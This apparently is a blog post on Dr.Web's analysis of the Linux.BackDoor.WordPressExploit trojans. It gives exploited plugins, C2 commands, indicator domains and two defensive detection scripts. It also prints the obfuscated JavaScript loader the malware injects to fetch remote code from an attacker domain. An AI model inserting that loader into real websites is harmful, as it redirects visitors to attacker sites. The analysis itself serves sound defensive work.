A new malware called Linux.BackDoor.WordPressExploit.1 has been discovered targeting WordPress sites, exploiting 30 vulnerabilities in outdated WordPress plugins and themes.
The malware injects malicious JavaScript into the targeted websites, which redirects visitors to attacker-chosen sites; the backdoor itself can be commanded to pause its logging, switch to standby mode or shut itself down. It specifically targets 32-bit versions of Linux, but can also affect 64-bit versions.
Security firm Dr.Web estimates that over 1,300 sites currently contain the JavaScript that powers this backdoor, though some of these sites may have removed the malware since being detected.
It is important for website owners to ensure that their plugins and themes are kept up to date in order to protect against these types of attacks. You can also use Secure WordPress Themes for your WordPress site.
Plugins exploited include:
- WP GDPR Compliance Plugin
- Newspaper Theme on WordPress Access Control (vulnerability CVE-2016-10972)
- Thim Core
- Google Code Inserter
- Total Donations Plugin
- Post Custom Templates Lite
- WP Quick Booking Manager
- Facebook Live Chat by Zotabox
- Blog Designer WordPress Plugin
- WP Live Chat Support Plugin
- WordPress – Yuzo Related Posts
- Yellow Pencil Visual Theme Customizer Plugin
- Easysmtp
- WordPress Ultimate FAQ (vulnerabilities CVE-2019-17232 and CVE-2019-17233)
- WP-Matomo Integration (WP-Piwik)
- WordPress ND Shortcodes For Visual Composer
- WP Live Chat
- WordPress Coming Soon Page
- WordPress theme OneTone
- Simple Fields WordPress Plugin
- WordPress Delucks SEO plugin
- Poll, Survey, Form & Quiz Maker by OpinionStage
- Social Metrics Tracker
- WPeMatico RSS Feed Fetcher
- Rich Reviews plugin
- Coming Soon Page and Maintenance Mode
- Hybrid
- Brizy WordPress Plugin
- FV Flowplayer Video Player
- WooCommerce
If a vulnerability is exploited, the targeted page will be injected with malicious JavaScript downloaded from a remote server.
This JavaScript will be launched first whenever the infected page is loaded, regardless of the page’s original content.
As a result, every time the user clicks on the infected page, they will be redirected to a website chosen by the attackers.
The malicious JavaScript injected into the targeted page contains links to various malicious domains, including:
- lobbydesires[.]com
- letsmakeparty3[.]ga
- deliverygoodstrategies[.]com
- gabriellalovecats[.]com
- css[.]digestcolect[.]com
- clon[.]collectfasttracks[.]com
- Count[.]trackstatisticsss[.]com
The screenshot below illustrates how the malicious JavaScript appears in the page source code of an infected site. It is important for website owners to check their site’s source code regularly and to be alert for any unfamiliar or suspicious code:
Researchers have discovered two versions of Linux.BackDoor malware: Linux.BackDoor.WordPressExploit.1 and Linux.BackDoor.WordPressExploit.2. It is believed that the malware has been in use for at least three years.
WordPress plugins have often been used to infect sites, as they can contain vulnerabilities that can lead to infection.
Criminals may use infected sites to redirect visitors to phishing sites, sites involved in ad fraud, or sites that distribute malware.
To protect their WordPress sites, users should ensure that they are using the most current versions of the main software and any plugins, and prioritize updating any plugins that are listed as vulnerable.
What is Linux backdoor malware?
Linux.BackDoor.WordPressExploit.1 is a malware that targets 32-bit versions of Linux, but can also affect 64-bit versions.
It is a remotely controlled backdoor that allows malicious actors to perform various actions, including:
- Attack a specified webpage (website);
- Switch to standby mode;
- Shut itself down;
- Pause logging its actions.
Linux.BackDoor.WordPressExploit.1 is a trojan that targets WordPress-based websites by exploiting known vulnerabilities in outdated WordPress plugins and themes. It injects a malicious script into the targeted websites, allowing the infected sites to be remotely controlled by malicious actors.
Before carrying out an attack, the trojan contacts its command and control server to receive the address of the site it is meant to infect.
It then attempts to exploit vulnerabilities in the aforementioned outdated plugins and themes that may be installed on the targeted website.
Linux.BackDoor.WordPressExploit.1
Added to the Dr.Web virus database: 2022-11-08
Virus description added: 2022-12-30
Packer: absent
SHA1: 215a4470063080696630fb6015378938e8c16a15
Linux.Backdoor.WordPressExploit.1 is controlled through the commands that it receives from a C&C server located at 109[.]234.38[.]69. The available commands are as follows:
- {a_webpage_address} — execute an attack on a specified webpage (website);
- wait — switch the trojan to standby mode;
- letmestop — shut down the trojan;
- dieforme77 — pause the trojan’s logging actions.
Before the attack, the backdoor tries attacking the site[.]com in test mode by sending an HTTP request as follows:
hxxp[:]//site[.]com/?action=um_fileupload&domain=test&name=test
If the response does not begin with the value s-1-s-2-s-3, Linux.Backdoor.WordPressExploit.1 proceeds to its main task. Otherwise, it shuts itself down.
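The test-mode probe above is sent to the targeted WordPress site itself, so it lands in that site's web-server access log. The following is an added example (not from Dr.Web or the original post) that parses combined-format access-log lines and flags requests carrying exactly the probe's query parameters; the log lines are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs
from typing import Dict, List

# Combined-format access-log line (Apache/nginx). Parsing regex written for this example.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3})'
)

# Query string of the backdoor's test-mode probe as reported by Dr.Web:
#   /?action=um_fileupload&domain=test&name=test
PROBE = {"action": "um_fileupload", "domain": "test", "name": "test"}

def is_probe(target: str) -> bool:
    """True if the request target carries exactly the test-mode parameter values."""
    qs = parse_qs(urlsplit(target).query)
    return all(qs.get(k) == [v] for k, v in PROBE.items())

def find_probes(lines: List[str]) -> List[Dict[str, str]]:
    """Return one record per log line that matches the test-mode probe."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_probe(m.group("target")):
            hits.append({"ip": m.group("ip"), "ts": m.group("ts"),
                         "status": m.group("status"), "target": m.group("target")})
    return hits

# Constructed sample log lines (not real traffic). Line 2 is the probe from the write-up;
# line 3 is a legitimate-looking call to the same action with different parameters.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Nov/2022:08:14:02 +0000] "GET /wp-login.php HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Nov/2022:08:14:05 +0000] "GET /?action=um_fileupload&domain=test&name=test HTTP/1.1" 200 312',
    '198.51.100.3 - - [10/Nov/2022:08:15:11 +0000] "GET /?action=um_fileupload&domain=example.com&name=avatar.png HTTP/1.1" 200 88',
    '198.51.100.9 - - [10/Nov/2022:08:16:40 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 43',
]

if __name__ == "__main__":
    for hit in find_probes(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} probe -> {hit["target"]} (HTTP {hit["status"]})')
```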
Before carrying out an attack, Linux.Backdoor.WordPressExploit.1 receives the address of the targeted website from a command and control server.
It then attempts to exploit 19 known vulnerabilities in various WordPress plugins and themes, starting 250 separate processes.
If it is successful in exploiting a vulnerability that has not been patched, the trojan will inform the command and control server.
Below is a list of the exploiting functions it uses:
The main goal of exploitation is to inject the following script into a vulnerable website:
```javascript
</style> <script async=true type=text/javascript language=javascript>
var nt = String.fromCharCode(98,101,114,116,54); // bert6
var mb = String.fromCharCode(97, 106, 97, 120, 67, 111, 117, 110, 116, 101, 114); // ajaxCounter
var sb = String.fromCharCode(115, 99, 114, 105, 112, 116); // script
var jb = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47); // {https://}
var tb = String.fromCharCode(116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116); // text/javascript
var lb = String.fromCharCode(103,97,98,114,105,101,108,108,97,108,111,118,101,99,97,116,115,46,99,111,109,47,108,111,110,101,46,106,115,63,122,111,110,101,105,100,61,56,57,54,53,52,51,50,38,117,116,109,95,99,61,52,38,109,114,111,61); // gabriellalovecats[.]com/lone.js?zoneid=8965432&utm_c=4&mro=
var c=document.createElement(sb); c.type=tb,c.async=1,c.src=jb+lb+nt;
var n=document.getElementsByTagName(sb)[0]; n.parentNode.insertBefore(c,n);
</script>
```
The purpose of the lone.js script is to inject itself into the attacked webpage. When the infected page is loaded, the lone.js script takes priority over all other elements on the page and is loaded first. The script is received from the hxxps[:]//gabriellalovecats[.]com domain.
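The injected loader hides its script URL behind String.fromCharCode character arrays, which defeats a plain grep for the domain. The following is an added example (not from Dr.Web or the original post) that decodes every such assignment found in a page's source, reassembles the loader URL the way the injection does (jb + lb + nt), and flags any decoded string naming one of the domains listed in this write-up; the page fragment is constructed from the script above.

```python
import re
from typing import Dict, List

# One "var x = String.fromCharCode(...)" assignment and its numeric argument list.
FROMCHARCODE_RE = re.compile(r'var\s+(\w+)\s*=\s*String\.fromCharCode\(([\d,\s]+)\)')

# Domains the Dr.Web write-up ties to the loader and redirect chain (defanging removed).
KNOWN_BAD = ("gabriellalovecats.com", "lobbydesires.com", "letsmakeparty3.ga",
             "deliverygoodstrategies.com", "css.digestcolect.com",
             "clon.collectfasttracks.com", "count.trackstatisticsss.com")

def decode_charcodes(args: str) -> str:
    """Turn '104, 116, 116' into 'htt', as String.fromCharCode would."""
    return "".join(chr(int(n)) for n in args.split(",") if n.strip())

def decode_vars(html: str) -> Dict[str, str]:
    """Map every fromCharCode-assigned JS variable in the page to its plaintext."""
    return {name: decode_charcodes(args) for name, args in FROMCHARCODE_RE.findall(html)}

def loader_url(decoded: Dict[str, str]) -> str:
    """Reassemble the script source the way the injection does: c.src = jb + lb + nt."""
    return "".join(decoded.get(k, "") for k in ("jb", "lb", "nt"))

def scan_page(html: str) -> List[str]:
    """Return one finding per decoded string that names a known injection domain."""
    findings = []
    for name, text in decode_vars(html).items():
        for bad in KNOWN_BAD:
            if bad in text.lower():
                findings.append(f"var {name}: decodes to text containing {bad}")
    return findings

# Constructed page fragment reproducing the injected loader from the write-up (comments stripped).
SAMPLE_HTML = """</style> <script async=true type=text/javascript language=javascript>
var nt = String.fromCharCode(98,101,114,116,54);
var sb = String.fromCharCode(115, 99, 114, 105, 112, 116);
var jb = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47);
var lb = String.fromCharCode(103,97,98,114,105,101,108,108,97,108,111,118,101,99,97,116,115,46,99,111,109,47,108,111,110,101,46,106,115,63,122,111,110,101,105,100,61,56,57,54,53,52,51,50,38,117,116,109,95,99,61,52,38,109,114,111,61);
var c=document.createElement(sb); c.type=tb,c.async=1,c.src=jb+lb+nt;
</script>"""

if __name__ == "__main__":
    for finding in scan_page(SAMPLE_HTML):
        print(finding)
    # Print the reassembled loader URL with the host defanged, as in the write-up.
    print("loader:", loader_url(decode_vars(SAMPLE_HTML)).replace(".com/", "[.]com/", 1))
```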
It is important for website owners to be vigilant for any unfamiliar or suspicious code in their site’s source code in order to protect against these types of attacks.
To receive a lone.js script, a request to the specified website is made with the following parameters:
hxxps[:]//gabriellalovecats[.]com/lone[.]js?zoneid=8965432&utm_c=4&mro=bert6
Once a webpage is infected, every time a user clicks anywhere on the page, they will be redirected to a website chosen by the attackers. The following are examples of the requests that may be executed upon such redirects:
- GET hxxps[:]//tommyforgreendream[.]icu/LLG94QPz
- POST hxxps[:]//transadforward[.]icu/v1yZLy
- GET hxxps[:]//tommyforgreendream[.]icu/LLG94QPz
While it is active, Linux.Backdoor.WordPressExploit.1 keeps track of its actions and reports statistics to its command and control server. These statistics include:
- the total number of websites attacked
- every instance of a vulnerability being exploited successfully
- the number of times it has successfully exploited the WordPress Ultimate FAQ plugin and the Facebook messenger from Zotabox
In addition, it reports any detected and unpatched vulnerabilities to its command and control server.
The trojan also contains an unimplemented feature for brute-forcing administrator accounts on targeted websites by checking known logins and passwords from a wordlist.
This feature may have been present in earlier versions of the trojan or may be planned for inclusion in future versions.
Linux.Backdoor.WordPressExploit.2
Linux.Backdoor.WordPressExploit.2 is a trojan that targets devices with x86-compatible Linux operating systems, including 32-bit and 64-bit versions.
This backdoor is a variant of Linux.Backdoor.WordPressExploit.1, with differences including the address of the command and control server, the domain from which the malicious script is downloaded, and an additional list of vulnerabilities to exploit.
It is important for website owners to keep their plugins and themes up to date in order to protect against these types of attacks.
Protect Your Website with WP Hacked Help: Scan for Backdoors and Other Vulnerabilities
If you are using any of the plugins exploited by Linux.Backdoor.WordPressExploit.2, we recommend running regular scans with WP Hacked Help.
This scanner can detect potential backdoors and vulnerabilities on your site and provide you with the necessary assistance to fix them promptly.
This is especially important because a Linux.Backdoor.WordPressExploit.2 infection can compromise the security of your website and potentially lead to data breaches or other security incidents.
By regularly scanning your WordPress site with WP Hacked Help, you can identify and address any vulnerabilities before they can be exploited by malicious actors.